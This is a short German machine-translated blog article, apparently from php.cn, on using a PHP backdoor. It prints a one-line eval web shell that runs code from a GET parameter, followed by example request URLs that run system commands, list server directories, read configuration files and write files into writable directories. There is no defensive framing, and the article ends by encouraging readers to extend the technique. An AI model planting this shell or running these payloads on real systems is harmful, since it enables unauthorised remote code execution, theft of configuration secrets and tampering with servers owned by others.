Heim  >  Artikel  >  Backend-Entwicklung  >  Einige Verwendungsmöglichkeiten der PHP-Hintertür

Einige Verwendungsmöglichkeiten der PHP-Hintertür

藏色散人
藏色散人nach vorne
2019-06-05 15:17:377023Durchsuche

Heute werden wir über einige der häufigsten Einsatzmöglichkeiten von Hintertüren in PHP sprechen

Schreiben Sie zunächst die einfachste Hintertür, die auch als Trojaner bezeichnet werden kann.

<?php eval($_GET[&#39;evl&#39;]);

Das war's, Sie haben viele Ausführungsberechtigungen auf diesem Server erhalten.

Wozu dient diese Szene?

Druckserverphpinfo

http://www.test.com/a.php?evl=phpinfo()

Überprüfen Sie, welche Dateien sich in einem Verzeichnis befinden

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

Überprüfen Sie, ob das Verzeichnis beschreibbar ist, und überprüfen Sie dann das beschreibbare Erstellen eine ausführbare Datei im Verzeichnis

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

Den Inhalt einer Datei abrufen, die im Allgemeinen zum Lesen der Konfiguration verwendet wird

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

Dateien in ein beschreibbares Verzeichnis schreiben

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

Okay, das Obige Der Teil hat im Grunde den Teil zerstört, der die Anzeige eines Servers vervollständigen kann. Versuchen wir, Rückschlüsse auf andere Funktionen zu ziehen.

Das obige ist der detaillierte Inhalt vonEinige Verwendungsmöglichkeiten der PHP-Hintertür. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Dieser Artikel ist reproduziert unter:aliyun.com. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen